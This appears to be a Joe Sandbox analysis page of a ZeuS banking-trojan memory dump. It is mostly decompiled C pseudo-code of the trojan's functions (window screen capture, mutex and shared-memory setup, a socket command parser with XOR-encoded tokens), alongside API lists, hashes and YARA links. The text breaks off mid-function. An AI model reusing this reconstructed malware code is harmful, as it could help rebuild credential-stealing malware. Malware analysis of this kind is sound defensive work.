Opcode ID: acc8290f2fcae533d9b5f27e27748a4bcde134c1bd91da6c49d678795a56892d
Instruction ID: a1c3eb8d67e2cf2cdf3e7a1924a5c8afb0f628e445b155b91b28c913fa100db8
Opcode Fuzzy Hash: acc8290f2fcae533d9b5f27e27748a4bcde134c1bd91da6c49d678795a56892d
Instruction Fuzzy Hash: 8DE0927140020EEADF219F71AA006EF3394EE00365B014527B864951D1E339E5E0DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1F6, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: e310851ef817243b59dbee2fda323c9f887b0857c3cf67b7e11af2043df4d9f3
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 83E0867AB801518BD755CE55D8C0D83B7A6FBD9370B2286E6C81587306CA38EDC3C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 00417275, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00417275(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E0040D2F3(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E00417193(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E00417193(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00417193(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x42323c,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00417193(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E00417193(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x42323c, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E00417193(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E00417193(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x00417275
0x00417284
0x0041728b
0x0041728e
0x00417293
0x004172a1
0x004172a3
0x004172aa
0x004172aa
0x004172b0
0x004172be
0x004172be
0x004172cb
0x004172ce
0x004172d1
0x004172d4
0x004172d7
0x004172e9
0x00417308
0x0041730b
0x00417310
0x00417312
0x00417315
0x0041731d
0x00417321
0x00417321
0x00417324
0x00417326
0x0041732e
0x00417332
0x00417332
0x0041732e
0x00417338
0x0041733b
0x0041733e
0x0041738c
0x00417340
0x00417347
0x0041735e
0x00417365
0x00417367
0x0041736a
0x00417372
0x00417376
0x00417376
0x00417379
0x0041737b
0x00417383
0x00417387
0x00417387
0x00417383
0x00417349
0x00417349
0x00417349
0x00417347
0x00417392
0x004173a4
0x004173a8
0x00000000
0x00000000
0x004173b7
0x004173b9
0x004173c1
0x00000000
0x00000000
0x004173c7
0x004173ce
0x004173d4
0x004173d9
0x004173e7
0x004173ef
0x0041756a
0x004175cb
0x004175ac
0x004175b0
0x004175b7
0x00000000
0x004175bd
0x004175d0
0x004175df
0x004175df
0x004175eb
0x004175f5
0x004175fd
0x004175a0
0x004175a7
0x004175ff
0x004175ff
0x004175ff
0x00000000
0x004175fd
0x0041756f
0x0041757e
0x0041757e
0x0041758a
0x0041759a
0x00000000
0x0041759a
0x004173f8
0x00417401
0x00417404
0x0041740d
0x00417414
0x00417421
0x00417424
0x00417427
0x00417437
0x00417452
0x00417458
0x00417467
0x00417467
0x00417474
0x00417484
0x00417487
0x0041748c
0x00417499
0x00417499
0x004174a7
0x004174b0
0x004174b0
0x004174ba
0x00417557
0x0041755e
0x00000000
0x004174c0
0x004174c3
0x004174cd
0x004174cd
0x004174d1
0x004174d8
0x004174de
0x004174e8
0x004174e8
0x004174f5
0x00417501
0x00417508
0x0041750c
0x0041750f
0x00417518
0x00417522
0x00417522
0x0041752f
0x00417532
0x00417537
0x00417544
0x00417544
0x00417552
0x00000000
0x00417552
0x004174c5
0x004174cb
0x00000000
0x00000000
0x00000000
0x004174cb
0x004174ba
0x004173dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00417392
0x004172eb
0x00000000
0x004172eb
0x00417295
0x00000000

APIs

Part of subcall function 0040D2F3: GetClassNameW.USER32 ref: 0040D30E

GetWindowInfo.USER32 ref: 004172E1
SelectObject.GDI32(00000000,?), ref: 004175B0
DeleteDC.GDI32(00000000), ref: 004175B7
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004175DF
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 004175F5

Strings

<, xrefs: 004172D7

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: 3e00893bffa9ee1258983e1421520ec10ddb6fd8cde11ad1c341e5170e57d74d
Instruction ID: 6fc06406df126ba94831ea69ac012378c3f6c03d4619ea1dde91af8773eb0296
Opcode Fuzzy Hash: 3e00893bffa9ee1258983e1421520ec10ddb6fd8cde11ad1c341e5170e57d74d
Instruction Fuzzy Hash: 98C18D71D04249BFDF11DFA4DD84EEEBFB9AF04300F04806AF915A6621D7388A85DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D35A, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D35A(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v5;
				struct HDC__* _v12;
				char _v16;
				short _v124;
				void* _v134;
				char _v612;
				char _v1081;
				char _v1428;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E00405299(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E0041C946(0x84889911,  &_v124, 0);
					_t66 = RegisterWindowMessageW( &_v124);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E0041C946(0x84889912,  &_v124, 1);
					_t71 = CreateEventW(0x4239e8, 1, 0,  &_v124);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E0041C946(0x18782822,  &_v124, 1);
					_t75 = CreateMutexW(0x4239e8, 0,  &_v124);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E0041C946(0x9878a222,  &_v124, 1);
					_t79 = CreateFileMappingW(0, 0x4239e8, 4, 0, 0x3d09128,  &_v124);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v5 = 0;
					_t82 = GetDC(0);
					_v12 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v5;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v12, 0xa);
					_t118 = __esi[0xb];
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v12, __esi[0xb], _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x423258
						_t87 = E0040B790(_t118, _t120, __eflags, _v12,  &_v16, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v12);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v16;
						_t90 =  *(_v16 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E004051E6(_t119);
						__eflags = _a4 - 1;
						_v5 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v5 = 0;
						E0041CC1D( &_v1428);
						E0041CC4A(_t119,  &_v612);
						_t43 =  &(_t124[0xf]); // 0x423274
						E00405222(_t43, 0x423c28, 0x10);
						_t124[0x13] = _v134;
						_t47 =  &(_t124[0x14]); // 0x423288
						E00405222(_t47,  &_v1081, 0x102);
						E0041C946(0x1898b122,  &_v124, 1);
						_t107 = CreateMutexW(0x4239e8, 0,  &_v124);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t112 = SelectObject(_t124[0x55], _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v5 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x0040d35a
0x0040d35a
0x0040d36e
0x0040d373
0x0040d379
0x0040d37f
0x0040d392
0x0040d39b
0x0040d3a1
0x0040d3a4
0x0040d3a6
0x00000000
0x00000000
0x0040d3b3
0x0040d3c5
0x0040d3cb
0x0040d3ce
0x0040d3d0
0x00000000
0x00000000
0x0040d3dd
0x0040d3e8
0x0040d3ee
0x0040d3f1
0x0040d3f3
0x00000000
0x00000000
0x0040d400
0x0040d413
0x0040d419
0x0040d41b
0x0040d41d
0x00000000
0x00000000
0x0040d429
0x0040d42f
0x0040d431
0x00000000
0x00000000
0x0040d437
0x0040d440
0x0040d443
0x0040d446
0x0040d44c
0x0040d44f
0x0040d451
0x0040d5bc
0x00000000
0x0040d5bc
0x0040d460
0x0040d463
0x0040d46d
0x0040d470
0x0040d472
0x0040d480
0x0040d485
0x0040d487
0x0040d49e
0x0040d49e
0x0040d489
0x0040d48c
0x0040d497
0x0040d497
0x0040d4a3
0x0040d4a7
0x0040d4ad
0x0040d4b0
0x0040d4b6
0x0040d4bd
0x0040d4c1
0x0040d4c7
0x0040d4cb
0x0040d4ce
0x0040d4d0
0x0040d4d5
0x0040d4d5
0x0040d4d5
0x0040d4d9
0x0040d4dc
0x0040d4e1
0x0040d4e5
0x0040d4e9
0x00000000
0x00000000
0x0040d4f5
0x0040d4f8
0x0040d504
0x0040d510
0x0040d514
0x0040d51f
0x0040d52e
0x0040d532
0x0040d542
0x0040d551
0x0040d557
0x0040d55d
0x0040d55f
0x00000000
0x00000000
0x0040d566
0x0040d56c
0x0040d56f
0x0040d571
0x0040d574
0x0040d57a
0x0040d580
0x0040d582
0x0040d58b
0x0040d58d
0x0040d593
0x0040d595
0x0040d59e
0x0040d5a4
0x0040d5aa
0x0040d5ac
0x0040d5ae
0x0040d5ae
0x0040d5ac
0x0040d595
0x0040d5b6
0x0040d5b6
0x0040d571
0x00000000
0x0040d4b0
0x0040d381
0x00000000

APIs

TlsAlloc.KERNEL32(00423238,00000000,0000018C,00000000,00000000), ref: 0040D373
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040D39B
CreateEventW.KERNEL32(004239E8,00000001,00000000,?,84889912,?,00000001), ref: 0040D3C5
CreateMutexW.KERNEL32(004239E8,00000000,?,18782822,?,00000001), ref: 0040D3E8
CreateFileMappingW.KERNEL32(00000000,004239E8,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040D413
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040D429
GetDC.USER32(00000000), ref: 0040D446
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D466
GetDeviceCaps.GDI32(?,0000000A), ref: 0040D470
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0040D483

Strings

9B, xrefs: 0040D3BF

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID: 9B
API String ID: 3765073151-1919367578
Opcode ID: cd9ede4be7e70c84d13df6d5cf00e9c1ba245c1c42a6c81821f10444fef4fff8
Instruction ID: c936e12c2cb7e1d96a9044a596121dfe7a94f8eb05a52cc999b983df75719d79
Opcode Fuzzy Hash: cd9ede4be7e70c84d13df6d5cf00e9c1ba245c1c42a6c81821f10444fef4fff8
Instruction Fuzzy Hash: 7F7132B1900744BFDB209FB1CD85AEA7BBCEB04304F10493EF952E2291D67999898F65

Uniqueness

Uniqueness Score: -1.00%

Function 00416E73, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00416E73(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x423444);
							_t83 = E00416D6B(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x02000809;
												__eflags = _t75 - 0x4750515d;
												if(_t75 == 0x4750515d) {
													goto L37;
												} else {
													__eflags = _t75 - 0x56414d4f;
													if(_t75 == 0x56414d4f) {
														goto L37;
													} else {
														__eflags = _t75 - 0x54534959;
														if(_t75 != 0x54534959) {
															__eflags = _t75 - 0x56415c5a;
															if(_t75 == 0x56415c5a) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x56534145;
																if(_t75 == 0x56534145) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E0040F34A(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E00408690( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E00408647( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E0040F34A(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E00418864(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E0040F34A(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E00405DF6(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E00416E0A(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x02000809;
						if(_t60 == 0x50455b5c || _t60 == 0x51534959) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E00405426(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x423444);
											_t94 = E00416D6B(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E004051E6( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E00416E0A(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E00416DA4(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E004051E6(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x423444);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x00416e73
0x00416e86
0x00416e88
0x00416e8a
0x004170e1
0x004170e1
0x004170e1
0x00416ea4
0x00416ea7
0x00416f90
0x00416f90
0x00416f93
0x00000000
0x00416f99
0x00416f9e
0x00416fac
0x00416fb0
0x00416fb2
0x00416fb8
0x00416fbb
0x004170d2
0x004170d2
0x00000000
0x00416fc1
0x00416fc1
0x00416fc4
0x00000000
0x00416fca
0x00416fca
0x00416fcd
0x00416fe5
0x00416fe5
0x00416fe8
0x00416ff0
0x00416ff6
0x00416ffc
0x00000000
0x00416ffe
0x00416ffe
0x00417004
0x00000000
0x00417006
0x00417006
0x0041700c
0x00417014
0x0041701a
0x00417028
0x00417028
0x0041702a
0x00000000
0x0041701c
0x0041701c
0x00417022
0x00000000
0x00000000
0x00417022
0x00000000
0x00000000
0x00000000
0x0041700c
0x00417004
0x00416ffc
0x00416fcf
0x00416fcf
0x00416fd1
0x00416fd3
0x00416fd9
0x00416fd9
0x00416fdd
0x00000000
0x00416fdf
0x00416fdf
0x00416fe3
0x0041700e
0x0041700e
0x00417010
0x0041702c
0x00417030
0x00417031
0x0041703b
0x00417043
0x0041704b
0x00417051
0x00417053
0x00417055
0x00417059
0x0041705e
0x00417060
0x00417062
0x00417065
0x0041708c
0x00417097
0x004170a2
0x004170a3
0x004170af
0x004170b0
0x004170b7
0x004170c6
0x00417067
0x00417067
0x0041706a
0x0041706e
0x00417072
0x00417073
0x00417078
0x0041707b
0x00417080
0x00417081
0x00417083
0x00417088
0x0041708a
0x00000000
0x00000000
0x0041708a
0x0041706a
0x00417065
0x00417060
0x004170ce
0x004170d3
0x004170d5
0x00000000
0x00000000
0x00000000
0x00416fe3
0x00416fd5
0x00416fd5
0x00416fd7
0x00000000
0x00000000
0x00000000
0x00000000
0x00416fd7
0x00416fd3
0x00416fcd
0x00416fc4
0x00416fbb
0x004170da
0x00000000
0x004170da
0x00416ead
0x00416eaf
0x00416eb9
0x00416eca
0x00000000
0x00416ed0
0x00416ed0
0x00416ed2
0x00416ed5
0x00416ed8
0x00000000
0x00416ede
0x00416ede
0x00416ede
0x00416ee4
0x00000000
0x00000000
0x00416eee
0x00000000
0x00416ef4
0x00416ef4
0x00416ef7
0x00000000
0x00000000
0x00000000
0x00000000
0x00416ef7
0x00000000
0x00416eee
0x00416efb
0x00000000
0x00416f09
0x00416f14
0x00416f18
0x00000000
0x00416f1e
0x00416f23
0x00416f28
0x00416f36
0x00416f3a
0x00416f52
0x00416f52
0x00416f55
0x00416f5a
0x00416f6d
0x00416f72
0x00416f5c
0x00416f60
0x00416f65
0x00416f65
0x00416f78
0x00416f3c
0x00416f44
0x00416f48
0x00000000
0x00416f4a
0x00416f4b
0x00416f4b
0x00416f48
0x00416f7a
0x00416f7e
0x00416f83
0x00416f89
0x00416f89
0x00416f18
0x00416efb
0x00416ed8
0x00000000
0x00000000
0x00000000
0x00416eb9
0x00416ea7
0x004170e3
0x004170e9

APIs

EnterCriticalSection.KERNEL32(00423444,0000FDE9,?), ref: 00416F28
LeaveCriticalSection.KERNEL32(00423444,?,000000FF), ref: 00416F83
EnterCriticalSection.KERNEL32(00423444), ref: 00416F9E
getpeername.WS2_32 ref: 0041704B

Strings

EASV, xrefs: 0041701C
YISQ, xrefs: 00416EBB
\[EP, xrefs: 00416EB4
OMAV, xrefs: 00416FFE
Z\AV, xrefs: 00417014
, xrefs: 00416EC6
U, xrefs: 00416F52
W, xrefs: 00416FD9
YIST, xrefs: 00417006
D, xrefs: 00416FDF
]QPG, xrefs: 00416FF6

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: $D$EASV$OMAV$U$W$YISQ$YIST$Z\AV$\[EP$]QPG
API String ID: 1099368488-790062061
Opcode ID: f7535fcba6434da17d520036efa07fec045eb6ad295ed609f7627973dd9a9245
Instruction ID: f48791b59930f81b68cb2578de48ca0e614e113c221ef35d1368b035bc8423c6
Opcode Fuzzy Hash: f7535fcba6434da17d520036efa07fec045eb6ad295ed609f7627973dd9a9245
Instruction Fuzzy Hash: 505167316083019ADF309A24CC857EB7FA15B09714F15862BF984A72A1DB3DDCC6874E

Uniqueness

Uniqueness Score: -1.00%

Function 004126B5, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004126B5(void _a4) {
				long _v12;
				void* _v16;
				void* _v20;
				char _v22;
				short _v24;
				char* _v32;
				char* _v36;
				intOrPtr _v40;
				void* _v44;
				char _v56;
				char _v64;
				char _v548;
				char _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t97;
				char* _t99;
				intOrPtr* _t106;
				void* _t109;
				intOrPtr* _t110;
				void* _t114;

				_t106 = _a4;
